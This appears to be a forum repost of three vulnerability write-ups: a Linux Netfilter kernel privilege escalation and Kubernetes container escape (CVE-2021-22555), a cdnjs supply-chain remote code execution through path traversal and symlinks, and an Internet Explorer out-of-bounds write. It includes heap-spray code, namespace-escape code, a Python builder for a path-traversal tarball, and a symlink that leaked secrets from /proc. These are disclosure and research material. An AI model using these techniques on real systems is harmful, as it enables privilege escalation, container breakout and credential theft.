Andy Nguyen (theflow@) - Information Security Engineer

CVE-2021-22555 is a 15-year-old heap out-of-bounds write vulnerability in Linux Netfilter that is powerful enough to bypass all modern security mitigations and achieve kernel code execution. It was used to break the Kubernetes pod isolation of the kCTF cluster and won 10000$ for charity (where Google will match and double the donation to 20000$).

Table of Contents
- Introduction
- Vulnerability
- Exploitation
  - Exploring struct msg_msg
  - Achieving use-after-free
  - Bypassing SMAP
  - Achieving a better use-after-free
  - Finding a victim object
  - Bypassing KASLR/SMEP
  - Escalating privileges
  - Kernel ROP chain
  - Escaping the container and popping a root shell
- Proof-Of-Concept
- Timeline
- Thanks

Introduction

After BleedingTooth, which was the first time I looked into Linux, I wanted to find a privilege escalation vulnerability as well. I started by looking at old vulnerabilities like CVE-2016-3134 and CVE-2016-4997, which inspired me to grep for memcpy() and memset() in the Netfilter code. This led me to some buggy code.

Vulnerability

When IPT_SO_SET_REPLACE or IP6T_SO_SET_REPLACE is called in compatibility mode — which requires the CAP_NET_ADMIN capability, obtainable in a user+network namespace — structures need to be converted from user to kernel as well as from 32bit to 64bit in order to be processed by the native functions. Naturally, this is destined to be error-prone.

Our vulnerability is in xt_compat_target_from_user(), where memset() is called at an offset target->targetsize that is not accounted for during the allocation — leading to a few bytes written out-of-bounds:

// https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/net/netfilter/x_tables.c
void xt_compat_target_from_user(struct xt_entry_target *t, void **dstptr, unsigned int *size)
{
	const struct xt_target *target = t->u.kernel.target;
	struct compat_xt_entry_target *ct = (struct compat_xt_entry_target *)t;
	int pad, off = xt_compat_target_offset(target);
	u_int16_t tsize = ct->u.user.target_size;
	char name[sizeof(t->u.user.name)];

	t = *dstptr;
	memcpy(t, ct, sizeof(*ct));
	if (target->compat_from_user)
		target->compat_from_user(t->data, ct->data);
	else
		memcpy(t->data, ct->data, tsize - sizeof(*ct));
	pad = XT_ALIGN(target->targetsize) - target->targetsize;
	if (pad > 0)
		memset(t->data + target->targetsize, 0, pad);

	tsize += off;
	t->u.user.target_size = tsize;
	strlcpy(name, target->name, sizeof(name));
	module_put(target->me);
	strncpy(t->u.user.name, name, sizeof(t->u.user.name));

	*size += off;
	*dstptr += tsize;
}

The targetsize is not controllable by the user, but one can choose different targets with different structure sizes by name (like TCPMSS, TTL or NFQUEUE). The bigger targetsize is, the more we can vary the offset. The target size must, however, not be 8-byte aligned in order to fulfill pad > 0.
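A quick sketch of the pad arithmetic, assuming XT_ALIGN rounds up to an 8-byte boundary (as it does on x86-64); the 0x4C value anticipates the NFLOG target discussed next:

def xt_align(sz, boundary=8):
    # assumed equivalent of XT_ALIGN on x86-64: round up to 8 bytes
    return (sz + boundary - 1) & ~(boundary - 1)

targetsize = 0x4C                        # sizeof(struct xt_nflog_info) = 76
pad = xt_align(targetsize) - targetsize  # 0x50 - 0x4C = 4
print(pad)                               # -> 4 zero bytes memset() out of bounds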
The biggest possible target I found is NFLOG, for which we can choose an offset of up to 0x4C bytes out-of-bounds (one can influence the offset by adding padding between struct xt_entry_match and struct xt_entry_target):

struct xt_nflog_info {
	/* 'len' will be used iff you set XT_NFLOG_F_COPY_LEN in flags */
	__u32 len;
	__u16 group;
	__u16 threshold;
	__u16 flags;
	__u16 pad;
	char prefix[64];
};

Note that the destination buffer is allocated with GFP_KERNEL_ACCOUNT and can also vary in size:

// https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/net/netfilter/x_tables.c
struct xt_table_info *xt_alloc_table_info(unsigned int size)
{
	struct xt_table_info *info = NULL;
	size_t sz = sizeof(*info) + size;

	if (sz < sizeof(*info) || sz >= XT_MAX_TABLE_SIZE)
		return NULL;

	info = kvmalloc(sz, GFP_KERNEL_ACCOUNT);
	if (!info)
		return NULL;

	memset(info, 0, sizeof(*info));
	info->size = size;
	return info;
}

The minimum size, though, is > 0x100, which means that the smallest slab this object can be allocated in is kmalloc-512. In other words, we have to find victims that are allocated between kmalloc-512 and kmalloc-8192.

Exploitation

Our primitive is limited to writing four bytes of zero up to 0x4C bytes out-of-bounds. With such a primitive, the usual targets are:

- Reference counter: Unfortunately, I could not find any suitable objects with a reference counter in the first 0x4C bytes.
- Free list pointer: CVE-2016-6187: Exploiting Linux kernel heap off-by-one is a good example of how to exploit the free list pointer. However, that was already 5 years ago, and meanwhile kernels have the CONFIG_SLAB_FREELIST_HARDENED option enabled, which among other things protects free list pointers.
- Pointer in a struct: This is the most promising approach; however, four bytes of zero is too much to write. For example, a pointer 0xffff91a49cb7f000 could only be turned into 0xffff91a400000000 or 0x9cb7f000, and both of them would likely be invalid pointers. On the other hand, if we used the primitive to write at the very beginning of the adjacent block, we could write fewer bytes, e.g. 2 bytes, and for example turn a pointer from 0xffff91a49cb7f000 into 0xffff91a49cb70000.

Playing around with some victim objects, I noticed that I could never reliably allocate them around struct xt_table_info on kernel 5.4. I realized that it had something to do with the GFP_KERNEL_ACCOUNT flag, as other objects allocated with GFP_KERNEL_ACCOUNT did not have this issue. Jann Horn confirmed that before 5.9, separate slabs were used to implement accounting. Therefore, every heap primitive we use in the exploit chain should also use GFP_KERNEL_ACCOUNT.

The syscall msgsnd() is a well-known primitive for heap spraying (which uses GFP_KERNEL_ACCOUNT) and has been utilized in multiple public exploits already. Its structure msg_msg, though, has surprisingly never been abused. In this write-up, we will demonstrate how this data structure can be abused to gain a use-after-free primitive, which in turn can be used to leak addresses and fake other objects. Coincidentally, in parallel to my research in March 2021, Alexander Popov also explored the very same structure in Four Bytes of Power: exploiting CVE-2021-26708 in the Linux kernel.
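Before following the author into struct msg_msg internals, here's a rough illustration of what msgsnd()-based spraying looks like from userland — done via ctypes for brevity, whereas the real PoC does this in C. The 4096-queue count and the kmalloc-1024 target mirror the write-up's secondary messages; the 48-byte msg_msg header size is an x86-64 assumption:

import ctypes

libc = ctypes.CDLL(None, use_errno=True)
IPC_PRIVATE, IPC_CREAT = 0, 0o1000

class MsgBuf(ctypes.Structure):
    # struct msgbuf { long mtype; char mtext[...]; }
    _fields_ = [("mtype", ctypes.c_long),
                ("mtext", ctypes.c_char * 1024)]

# sizeof(struct msg_msg) is 48 on x86-64, so a 976-byte payload makes the
# whole allocation land in kmalloc-1024 (48 + 976 = 1024).
PAYLOAD_LEN = 1024 - 48

queues = []
for i in range(4096):
    qid = libc.msgget(IPC_PRIVATE, IPC_CREAT | 0o600)
    msg = MsgBuf(mtype=1)
    msg.mtext = bytes([i & 0xFF]) * PAYLOAD_LEN  # tag the spray with the queue index
    if libc.msgsnd(qid, ctypes.byref(msg), PAYLOAD_LEN, 0) != 0:
        raise OSError(ctypes.get_errno(), "msgsnd failed")
    queues.append(qid)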
Exploring struct msg_msg

When sending data with msgsnd(), the payload is split into multiple segments:

// https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/ipc/msgutil.c
static struct msg_msg *alloc_msg(size_t len)
{
	struct msg_msg *msg;
	struct msg_msgseg **pseg;
	size_t alen;

	alen = min(len, DATALEN_MSG);
	msg = kmalloc(sizeof(*msg) + alen, GFP_KERNEL_ACCOUNT);
	if (msg == NULL)
		return NULL;

	msg->next = NULL;
	msg->security = NULL;

	len -= alen;
	pseg = &msg->next;
	while (len > 0) {
		struct msg_msgseg *seg;

		cond_resched();

		alen = min(len, DATALEN_SEG);
		seg = kmalloc(sizeof(*seg) + alen, GFP_KERNEL_ACCOUNT);
		if (seg == NULL)
			goto out_err;
		*pseg = seg;
		seg->next = NULL;
		pseg = &seg->next;
		len -= alen;
	}

	return msg;

out_err:
	free_msg(msg);
	return NULL;
}

where the headers for struct msg_msg and struct msg_msgseg are:

// https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/include/linux/msg.h
/* one msg_msg structure for each message */
struct msg_msg {
	struct list_head m_list;
	long m_type;
	size_t m_ts;		/* message text size */
	struct msg_msgseg *next;
	void *security;
	/* the actual message follows immediately */
};

// https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/include/linux/types.h
struct list_head {
	struct list_head *next, *prev;
};

// https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/ipc/msgutil.c
struct msg_msgseg {
	struct msg_msgseg *next;
	/* the next part of the message follows immediately */
};

The first member in struct msg_msg is the mlist.next pointer, which points to another message in the queue (this is different from next, which points to the next segment). This is a perfect candidate to corrupt, as you will learn next.

Achieving use-after-free

First, we initialize a lot of message queues (in our case 4096) using msgget(). Then, we send one message of size 4096 (including the struct msg_msg header) for each of the message queues using msgsnd(), which we will call the primary message. Eventually, after a lot of messages, we have some that are consecutive:

[Figure 1: A series of blocks of primary messages]

Next, we send a secondary message of size 1024 for each of the message queues using msgsnd():

[Figure 2: A series of blocks of primary messages pointing to secondary messages]

Finally, we create some holes (in our case every 1024th) in the primary messages, and trigger the vulnerable setsockopt(IPT_SO_SET_REPLACE) option, which, in the best scenario, will allocate the struct xt_table_info object in one of the holes:

[Figure 3: A xt_table_info allocated in between the blocks which corrupts the next pointer]

We choose to overwrite two bytes of the adjacent object with zeros. Assuming we are adjacent to another primary message, the bytes we overwrite are part of the pointer to the secondary message. Since we allocate the secondary messages with a size of 1024 bytes, we therefore have a 1 - (1024 / 65536) chance of redirecting the pointer (the only case where we fail is when the two least significant bytes of the pointer are already zero).

Now, the best scenario we can hope for is that the manipulated pointer also points to a secondary message, since the consequence will be two different primary messages pointing to the same secondary message, and this can lead to a use-after-free:

[Figure 4: Two primary messages pointing to the same secondary message due to the corrupted pointer]

However, how do we know which two primary messages are pointing to the same secondary message?
In order to answer this question, we tag every (primary and secondary) message with the index of its message queue, which is in [0, 4096). Then, after triggering the corruption, we iterate through all message queues, peek at all messages using msgrcv() with MSG_COPY, and check whether the tags match. If the tag of the primary message is different from that of the secondary message, the pointer has been redirected. In that case, the tag of the primary message represents the index of the fake message queue, i.e. the one containing the wrong secondary message, and the tag of the wrong secondary message represents the index of the real message queue. Knowing these two indices, achieving a use-after-free is now trivial — we fetch the secondary message from the real message queue using msgrcv() and thereby free it:

[Figure 5: Freed secondary message with a stale reference]

Note that we still have a reference to the freed message in the fake message queue.

Bypassing SMAP

Using unix sockets (which can easily be set up with socketpair()), we now spray a lot of messages of size 1024 and imitate the struct msg_msg header. Ideally, we are able to reclaim the address of the previously freed message:

[Figure 6: Fake struct msg_msg put in place of the freed secondary message]

Note that mlist.next is 41414141, as we do not yet know any kernel addresses (and with SMAP enabled, we cannot specify a user address). Not having a kernel address is crucial, as it actually prevents us from freeing the block again (you will learn later why that is desired). The reason is that during msgrcv(), the message is unlinked from the message queue, which is a circular list. Luckily, we are actually in a good position to achieve an information leak, as there are some interesting fields in struct msg_msg. Namely, the field m_ts is used to determine how much data to return to userland:

// https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/ipc/msgutil.c
struct msg_msg *copy_msg(struct msg_msg *src, struct msg_msg *dst)
{
	struct msg_msgseg *dst_pseg, *src_pseg;
	size_t len = src->m_ts;
	size_t alen;

	if (src->m_ts > dst->m_ts)
		return ERR_PTR(-EINVAL);

	alen = min(len, DATALEN_MSG);
	memcpy(dst + 1, src + 1, alen);
	...
	return dst;
}

The original size of the message is only 1024-sizeof(struct msg_msg) bytes, which we can now artificially increase to DATALEN_MSG = 4096-sizeof(struct msg_msg). As a consequence, we will be able to read past the intended message size and leak the struct msg_msg header of the adjacent message. As said before, the message queue is implemented as a circular list, thus mlist.next points back to the primary message. Knowing the address of a primary message, we can re-craft the fake struct msg_msg with that address as next (meaning that it is the next segment). The content of the primary message can then be leaked by reading more than DATALEN_MSG bytes. The leaked mlist.next pointer from the primary message reveals the address of the secondary message that is adjacent to our fake struct msg_msg. Subtracting 1024 from that address, we finally have the address of the fake message.

Achieving a better use-after-free

Now, we can rebuild the fake struct msg_msg object with the leaked address as mlist.next and mlist.prev (meaning that it points to itself), making the fake message free-able through the fake message queue.
[Figure 7: Fake struct msg_msg with a valid next pointer pointing to itself]

Note that when spraying using unix sockets, we actually have a struct sk_buff object which points to the fake message. Obviously, this means that when we free the fake message, we still have a stale reference:

[Figure 8: Freed fake message with a stale reference]

This stale struct sk_buff data buffer is a better use-after-free scenario to exploit, because it does not contain header information, meaning that we can now use it to free any kind of object on the slab. In comparison, freeing a struct msg_msg object is only possible if the first two members are writable pointers (needed to unlink the message).

Finding a victim object

The best victim to attack is one that has a function pointer in its structure. Remember that the victim must also be allocated with GFP_KERNEL_ACCOUNT. Talking to Jann Horn, he suggested the struct pipe_buffer object, which is allocated in kmalloc-1024 (hence why the secondary message is 1024 bytes). A struct pipe_buffer can easily be allocated with pipe(), which has alloc_pipe_info() as a subroutine:

// https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/fs/pipe.c
struct pipe_inode_info *alloc_pipe_info(void)
{
	...
	unsigned long pipe_bufs = PIPE_DEF_BUFFERS;
	...
	pipe = kzalloc(sizeof(struct pipe_inode_info), GFP_KERNEL_ACCOUNT);
	if (pipe == NULL)
		goto out_free_uid;
	...
	pipe->bufs = kcalloc(pipe_bufs, sizeof(struct pipe_buffer), GFP_KERNEL_ACCOUNT);
	...
}

While it does not contain a function pointer directly, it contains a pointer to struct pipe_buf_operations, which in turn holds function pointers:

// https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/include/linux/pipe_fs_i.h
struct pipe_buffer {
	struct page *page;
	unsigned int offset, len;
	const struct pipe_buf_operations *ops;
	unsigned int flags;
	unsigned long private;
};

struct pipe_buf_operations {
	...
	/*
	 * When the contents of this pipe buffer has been completely
	 * consumed by a reader, ->release() is called.
	 */
	void (*release)(struct pipe_inode_info *, struct pipe_buffer *);
	...
};

Bypassing KASLR/SMEP

When one writes to the pipes, struct pipe_buffer is populated. Most importantly, ops will point to the static structure anon_pipe_buf_ops, which resides in the .data segment:

// https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/fs/pipe.c
static const struct pipe_buf_operations anon_pipe_buf_ops = {
	.release	= anon_pipe_buf_release,
	.try_steal	= anon_pipe_buf_try_steal,
	.get		= generic_pipe_buf_get,
};

Since the distance between the .data segment and the .text segment is always the same, having the address of anon_pipe_buf_ops basically allows us to calculate the kernel base address. We spray a lot of struct pipe_buffer objects and reclaim the location of the stale struct sk_buff data buffer:

[Figure 9: Freed fake message reclaimed with a struct pipe_buffer]

As we still have a reference from the struct sk_buff, we can read its data buffer, leak the content of struct pipe_buffer and reveal the address of anon_pipe_buf_ops:

[+] anon_pipe_buf_ops: ffffffffa1e78380
[+] kbase_addr: ffffffffa0e00000

With this information, we can now find JOP/ROP gadgets. Note that when reading from the unix socket, we actually free its buffer as well:

[Figure 10: Freed fake message reclaimed with a struct pipe_buffer]

Escalating privileges

We reclaim the stale struct pipe_buffer with a fake one whose ops field points to a fake struct pipe_buf_operations.
This fake structure is planted at the same location, since we know its address, and obviously it should contain a malicious function pointer as release:

[Figure 11: Freed struct pipe_buffer reclaimed with a fake struct pipe_buffer]

The final stage of the exploit is to close all pipes in order to trigger the release, which in turn will kick off the JOP chain. Finding JOP gadgets is hard, thus the goal is to achieve a kernel stack pivot as soon as possible in order to execute a kernel ROP chain.

Kernel ROP chain

We save the value of RBP at some scratchpad address in the kernel so that we can later resume execution; then we call commit_creds(prepare_kernel_cred(NULL)) to install kernel credentials, and finally we call switch_task_namespaces(find_task_by_vpid(1), init_nsproxy) to switch the namespace of process 1 to that of the init process. After that, we restore the value of RBP and return to resume execution (which will immediately make free_pipe_info() return).

Escaping the container and popping a root shell

Arriving back in userland, we now have root permissions to change the mnt, pid and net namespaces, escape the container and break out of the kubernetes pod. Ultimately, we pop a root shell.

setns(open("/proc/1/ns/mnt", O_RDONLY), 0);
setns(open("/proc/1/ns/pid", O_RDONLY), 0);
setns(open("/proc/1/ns/net", O_RDONLY), 0);

char *args[] = {"/bin/bash", "-i", NULL};
execve(args[0], args, NULL);

Proof-Of-Concept

The Proof-Of-Concept is available at https://github.com/google/security-research/tree/master/pocs/linux/cve-2021-22555. Executing it on a vulnerable machine will grant you root:

theflow@theflow:~$ gcc -m32 -static -o exploit exploit.c
theflow@theflow:~$ ./exploit
[+] Linux Privilege Escalation by theflow@ - 2021

[+] STAGE 0: Initialization
[*] Setting up namespace sandbox...
[*] Initializing sockets and message queues...

[+] STAGE 1: Memory corruption
[*] Spraying primary messages...
[*] Spraying secondary messages...
[*] Creating holes in primary messages...
[*] Triggering out-of-bounds write...
[*] Searching for corrupted primary message...
[+] fake_idx: ffc
[+] real_idx: fc4

[+] STAGE 2: SMAP bypass
[*] Freeing real secondary message...
[*] Spraying fake secondary messages...
[*] Leaking adjacent secondary message...
[+] kheap_addr: ffff91a49cb7f000
[*] Freeing fake secondary messages...
[*] Spraying fake secondary messages...
[*] Leaking primary message...
[+] kheap_addr: ffff91a49c7a0000

[+] STAGE 3: KASLR bypass
[*] Freeing fake secondary messages...
[*] Spraying fake secondary messages...
[*] Freeing sk_buff data buffer...
[*] Spraying pipe_buffer objects...
[*] Leaking and freeing pipe_buffer object...
[+] anon_pipe_buf_ops: ffffffffa1e78380
[+] kbase_addr: ffffffffa0e00000

[+] STAGE 4: Kernel code execution
[*] Spraying fake pipe_buffer objects...
[*] Releasing pipe_buffer objects...
[*] Checking for root...
[+] Root privileges gained.

[+] STAGE 5: Post-exploitation
[*] Escaping container...
[*] Cleaning up...
[*] Popping root shell...
root@theflow:/# id
uid=0(root) gid=0(root) groups=0(root)
root@theflow:/#

Timeline

2021-04-06 - Vulnerability reported to security@kernel.org.
2021-04-13 - Patch merged upstream.
2021-07-07 - Public disclosure.

Thanks

- Eduardo Vela
- Francis Perron
- Jann Horn

Sursa: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
20. Remote code execution in cdnjs of Cloudflare

2021-07-16

Preface

(A Japanese version of this article is also available.)

Cloudflare, which runs cdnjs, operates a "Vulnerability Disclosure Program" on HackerOne that allows hackers to perform vulnerability assessments. This article describes a vulnerability reported through this program and published with the permission of the Cloudflare security team, so it is not an encouragement to perform unauthorized vulnerability assessments. If you find any vulnerabilities in a Cloudflare product, please report them to Cloudflare's vulnerability disclosure program.

TL;DR

There was a vulnerability in the cdnjs library update server that could execute arbitrary commands, and as a result, cdnjs could be completely compromised. This would allow an attacker to tamper with 12.7%[1] of all websites on the internet once caches expired.

About cdnjs

cdnjs is a JavaScript/CSS library CDN owned by Cloudflare, used by 12.7% of all websites on the internet as of 15 July 2021. This makes it the second most widely used library CDN, just behind Google Hosted Libraries at 12.8%[2], and given the current usage trend it will likely become the most used JavaScript library CDN in the near future.

[Figure: Usage graph of cdnjs from W3Techs, as of 15 July 2021]

Reason for investigation

A few weeks before my last investigation into "Remote code execution in Homebrew by compromising the official Cask repository", I was investigating supply chain attacks. While looking for a service that much software depends on and that allows users to perform vulnerability assessments, I found cdnjs. So I decided to investigate it.

Initial investigation

While browsing the cdnjs website, I found the following description:

Couldn't find the library you're looking for? You can make a request to have it added on our GitHub repository.

I found out that the library information is managed in a GitHub repository, so I checked the repositories of the GitHub Organization used by cdnjs. As a result, it turned out the repositories are used in the following ways:

- cdnjs/packages: Stores information about the libraries supported by cdnjs
- cdnjs/cdnjs: Stores the library files
- cdnjs/logs: Stores library update logs
- cdnjs/SRIs: Stores the SRIs (Subresource Integrity hashes) of the libraries
- cdnjs/static-website: Source code of cdnjs.com
- cdnjs/origin-worker: Cloudflare Worker for the origin of cdnjs.cloudflare.com
- cdnjs/tools: cdnjs management tools
- cdnjs/bot-ansible: Ansible repository of the cdnjs library update server

As you can see from these repositories, most of the cdnjs infrastructure is centralized in this GitHub Organization. I was interested in cdnjs/bot-ansible and cdnjs/tools because they automate library updates. After reading the code of these two repositories, it turned out that cdnjs/bot-ansible periodically executes the autoupdate command of cdnjs/tools on the cdnjs library update server to check for updates to the libraries listed in cdnjs/packages, downloading the npm package / Git repository of each one.

Investigation of automatic update

The automatic update function updates a library by downloading the user-managed Git repository / npm package and copying the target files from it. The npm registry compresses libraries into .tgz files to make them downloadable. Since the tool for this automatic update is written in Go, I guessed that it may use Go's compress/gzip and archive/tar to extract the archive file.
Go's archive/tar returns the filenames contained in the archive without sanitizing them[3], so if the archive is extracted to disk based on the filenames returned from archive/tar, an archive containing a filename like ../../../../../../../tmp/test may overwrite arbitrary files on the system.[4]

From the information in cdnjs/bot-ansible, I knew that some scripts were running regularly and that the user running the autoupdate command had write permission to them, so I focused on overwriting files via path traversal.

Path traversal

To find a path traversal, I started reading the main function of the autoupdate command.

func main() {
	[...]
	switch *pckg.Autoupdate.Source {
	case "npm":
		{
			util.Debugf(ctx, "running npm update")
			newVersionsToCommit, allVersions = updateNpm(ctx, pckg)
		}
	case "git":
		{
			util.Debugf(ctx, "running git update")
			newVersionsToCommit, allVersions = updateGit(ctx, pckg)
		}
	[...]
}

As you can see from the code snippet above, if npm is specified as the source of auto-update, the package information is passed to the updateNpm function.

func updateNpm(ctx context.Context, pckg *packages.Package) ([]newVersionToCommit, []version) {
	[...]
	newVersionsToCommit = doUpdateNpm(ctx, pckg, newNpmVersions)
	[...]
}

updateNpm then passes information about the new library version to the doUpdateNpm function.

func doUpdateNpm(ctx context.Context, pckg *packages.Package, versions []npm.Version) []newVersionToCommit {
	[...]
	for _, version := range versions {
		[...]
		tarballDir := npm.DownloadTar(ctx, version.Tarball)
		filesToCopy := pckg.NpmFilesFrom(tarballDir)
	[...]
}

doUpdateNpm passes the URL of the .tgz file to npm.DownloadTar.

func DownloadTar(ctx context.Context, url string) string {
	dest, err := ioutil.TempDir("", "npmtarball")
	util.Check(err)

	util.Debugf(ctx, "download %s in %s", url, dest)

	resp, err := http.Get(url)
	util.Check(err)
	defer resp.Body.Close()

	util.Check(Untar(dest, resp.Body))
	return dest
}

Finally, the .tgz file obtained with http.Get is passed to the Untar function.

func Untar(dst string, r io.Reader) error {
	gzr, err := gzip.NewReader(r)
	if err != nil {
		return err
	}
	defer gzr.Close()

	tr := tar.NewReader(gzr)

	for {
		header, err := tr.Next()
		[...]
		// the target location where the dir/file should be created
		target := filepath.Join(dst, removePackageDir(header.Name))
		[...]
		// check the file type
		switch header.Typeflag {
		[...]
		// if it's a file create it
		case tar.TypeReg:
			{
				[...]
				f, err := os.OpenFile(target, os.O_CREATE|os.O_RDWR, os.FileMode(header.Mode))
				[...]
				// copy over contents
				if _, err := io.Copy(f, tr); err != nil {
					return err
				}
			}
		}
	}
}

As I had guessed, compress/gzip and archive/tar are used in the Untar function to extract the .tgz file. At first, I thought the path was being sanitized in the removePackageDir function, but when I checked the contents of that function, I noticed that it merely removes package/ from the path.

From these code snippets, I confirmed that arbitrary code could be executed by performing a path traversal from a .tgz file published to npm and overwriting one of the scripts that are executed regularly on the server.
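A .tgz with such a traversing member name can be produced with standard tooling — tools like evilarc automate this, but a minimal sketch (hypothetical paths, harmless payload) looks like this:

import io
import tarfile

# File content that would land outside the extraction directory.
payload = b"echo pwned\n"

with tarfile.open("evil.tgz", "w:gz") as tgz:
    # Leading "package/" survives removePackageDir being stripped; the rest escapes dst.
    info = tarfile.TarInfo(name="package/../../../../../tmp/regular-job.sh")
    info.size = len(payload)
    info.mode = 0o755
    tgz.addfile(info, io.BytesIO(payload))

Fed to the Untar function above, the member name survives removePackageDir (only the leading package/ is stripped), and the filepath.Join result escapes dst, writing /tmp/regular-job.sh.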
Demonstration of vulnerability

Because Cloudflare is running a vulnerability disclosure program on HackerOne, it's likely that HackerOne's triage team won't forward a report to Cloudflare unless it shows that the vulnerability is actually exploitable. Therefore, I decided to do a demonstration to show that the vulnerability can actually be exploited. The attack procedure is as follows:

1. Publish a .tgz file that contains the crafted filename to the npm registry.
2. Wait for the cdnjs library update server to process the crafted .tgz file.
3. The contents of the file published in step 1 are written into a regularly executed script file, and an arbitrary command is executed.

… and after writing the attack procedure into my notepad, for some reason, I started wondering how automatic updates based on the Git repository work. So I read the code a bit before demonstrating the vulnerability, and it seemed that symlinks aren't considered when copying files from the Git repository.

func MoveFile(sourcePath, destPath string) error {
	inputFile, err := os.Open(sourcePath)
	if err != nil {
		return fmt.Errorf("Couldn't open source file: %s", err)
	}
	outputFile, err := os.Create(destPath)
	if err != nil {
		inputFile.Close()
		return fmt.Errorf("Couldn't open dest file: %s", err)
	}
	defer outputFile.Close()
	_, err = io.Copy(outputFile, inputFile)
	inputFile.Close()
	if err != nil {
		return fmt.Errorf("Writing to output file failed: %s", err)
	}
	// The copy was successful, so now delete the original file
	err = os.Remove(sourcePath)
	if err != nil {
		return fmt.Errorf("Failed removing original file: %s", err)
	}
	return nil
}

As Git supports symbolic links by default, it may be possible to read arbitrary files from the cdnjs library update server by adding a symlink to the Git repository. If the regularly executed script file were overwritten to execute arbitrary commands, the automatic update function might break, so I decided to check the arbitrary file read first. Along with this, the attack procedure was changed as follows:

1. Add a symbolic link that points to a harmless file (assumed to be /proc/self/maps here) to the Git repository.
2. Publish a new version in the repository.
3. Wait for the cdnjs library update server to process the crafted repository.
4. The specified file is published on cdnjs.

It was around 20:00 at this point, but all I had to do was create a symlink, so I decided to eat dinner after creating the symbolic link and publishing it.[5]

ln -s /proc/self/maps test.js

Incident

Once I had finished dinner and returned to my desk, I was able to confirm that cdnjs had released a version containing the symbolic link. When checking the contents of the file in order to send the report, I was surprised. Shockingly, clearly sensitive information such as GITHUB_REPO_API_KEY and WORKERS_KV_API_TOKEN was displayed. I couldn't understand what had happened for a moment, and when I checked the command log, I found that I had accidentally created a link to /proc/self/environ instead of /proc/self/maps.[6]

As mentioned earlier, if cdnjs' GitHub Organization is compromised, it's possible to compromise most of the cdnjs infrastructure. I needed to take immediate action, so I sent a report containing only a link showing the current situation and requested that they revoke all credentials. At this point I was very confused and hadn't confirmed it yet, but in fact these tokens had already been invalidated before I sent the report. It seems that GitHub notified Cloudflare immediately because GITHUB_REPO_API_KEY (a GitHub API key) was included in the repository, and Cloudflare started incident response immediately after the notification. I felt that they have a great security team, because they invalidated all credentials within minutes after cdnjs processed the specially crafted repository.

Determining the impact

After the incident, I investigated what could have been impacted. GITHUB_REPO_API_KEY was an API key for robocdnjs, which belongs to the cdnjs organization and had write permission to each repository.
This means it was possible to tamper with arbitrary libraries on cdnjs, or to tamper with cdnjs.com itself. Also, WORKERS_KV_API_TOKEN had permission over the Cloudflare Workers KV used by cdnjs, so it could be used to tamper with the libraries in the KV cache. By combining these permissions, the core parts of cdnjs — the origin data of cdnjs, the KV cache, and even the cdnjs website — could be completely tampered with.

Conclusion

In this article, I described the vulnerability that existed in cdnjs. While this vulnerability could be exploited without any special skills, it could have impacted many websites. Given that there are many vulnerabilities in the supply chain which are easy to exploit but have a large impact, I find this very scary. If you have any questions/comments about this article, please send a message to @ryotkak on Twitter.

Timeline

Date (JST) — Event
April 6, 2021 19:00 — Found the vulnerability
April 6, 2021 20:00 — Published a crafted symlink
April 6, 2021 20:30 — cdnjs processed the file
At the same time — GitHub sent an alert to Cloudflare
At the same time — Cloudflare started an incident response
Within minutes — Cloudflare finished revoking the credentials
April 6, 2021 20:40 — I sent an initial report
April 6, 2021 21:00 — I sent a detailed report
April 7, 2021 – — Secondary fix applied
June 3, 2021 — Complete fix applied
July 16, 2021 — Published this article

[1] Quoted from W3Techs as of 15 July 2021. Due to the presence of SRI / caches, fewer websites could be tampered with immediately.
[2] Quoted from W3Techs as of 15 July 2021.
[3] https://github.com/golang/go/issues/25849
[4] Archives like this can be created using tools such as evilarc.
[5] I don't know if this is correct, but I remember that the dinner that day was frozen gyoza (dumplings). (It was yummy!)
[6] Because I was tired from work and hungry, I ran the command completed by the shell without any confirmation.

Sursa: https://blog.ryotak.me/post/cdnjs-remote-code-execution-en/
21. CVE-2021-33742: Internet Explorer out-of-bounds write in MSHTML

Maddie Stone, Google Project Zero & Threat Analysis Group

The Basics

Disclosure or Patch Date: 03 June 2021
Product: Microsoft Internet Explorer
Advisory: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-33742
Affected Versions: For Windows 10 20H2 x64, KB5003173 and previous
First Patched Version: For Windows 10 20H2 x64, KB5003637
Issue/Bug Report: N/A
Patch CL: N/A
Bug-Introducing CL: N/A
Reporter(s): Clément Lecigne of Google's Threat Analysis Group

The Code

Proof-of-concept: Proof-of-concept by Ivan Fratric of Project Zero

<script>
var b = document.createElement("html");
b.innerHTML = Array(40370176).toString();
b.innerHTML = "";
</script>

Exploit sample: Examples of the Word documents used to distribute this exploit:
656d19186795280a068fcb97e7ef821b55ad3d620771d42ed98d22ee3c635e67
851bf4ab807fc9b29c9f6468c8c89a82b8f94e40474c6669f105bce91f278fdb

Did you have access to the exploit sample when doing the analysis? Yes

The Vulnerability

Bug class: Out-of-bounds write

Vulnerability details: The vulnerability is due to the size of the string of the inner html element being truncated (size & 0x1FFFFFF) in the CTreePos structure, while the non-truncated size is still in the text data object. The memory at [1] is allocated based on the size in the CTreePos structure, the truncated size. The text data returned by MSHTML!Tree::TextData::GetText [2] includes the full non-truncated length of the string. The non-truncated length is then passed as the src length to wmemcpy_s [3], while the allocated destination memory uses the truncated length. While wmemcpy_s protects against the buffer overflow here, the source size is used as the increment even though that was not the number of bytes actually copied: the size of the allocation was. The index (v190) is incremented by the larger number. When that index is then used to access the memory allocated at [1], it leads to the out-of-bounds write at MSHTML!CSpliceTreeEngine::RemoveSplice+0xb1f.

if ( v172 >= 90000 && ((_BYTE)v4[21] & 4) != 0 )
{
  v70 = 1 - CTreePos::GetCp(v4[5]);
  v71 = CTreePos::GetCp(v4[6]);   /*** v71 = Truncated size (orig_sz&0x1ffffff) ***/
  v72 = v4[6];
  v104 = (*(_BYTE *)v72 & 4) == 0;
  v189 = (CTreeNode *)(v70 + v71);
  if ( !v104 )
  {
    v73 = CTreeDataPos::GetTextLength(v72);
